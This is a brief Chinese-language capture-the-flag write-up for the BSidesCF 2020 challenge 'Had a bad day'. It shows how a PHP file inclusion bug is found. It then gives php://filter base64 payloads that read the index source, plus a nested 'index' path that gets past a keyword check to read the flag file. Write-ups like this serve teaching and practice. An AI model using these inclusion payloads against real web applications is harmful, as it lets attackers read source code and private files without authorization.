[BSidesCF 2020]Had a bad day

进去网页,没找到有什么功能点

 

 关注url的get传参,随便传个值

 

 爆出文件不存在,考虑是文件包含的考察。

所以就可以考虑伪协议,

直接读取index的代码

php://filter/read=convert.base64-encode/resource=index

 

 看来只是要求get参数里存在要求的字符即可

php://filter协议是可以套接的

套接个index,随便猜一个flag目录

php://filter/read=convert.base64-encode/index/resource=flag得到flag

posted @ 2021-10-25 20:20  C10ud  阅读(38)  评论(0编辑  收藏  举报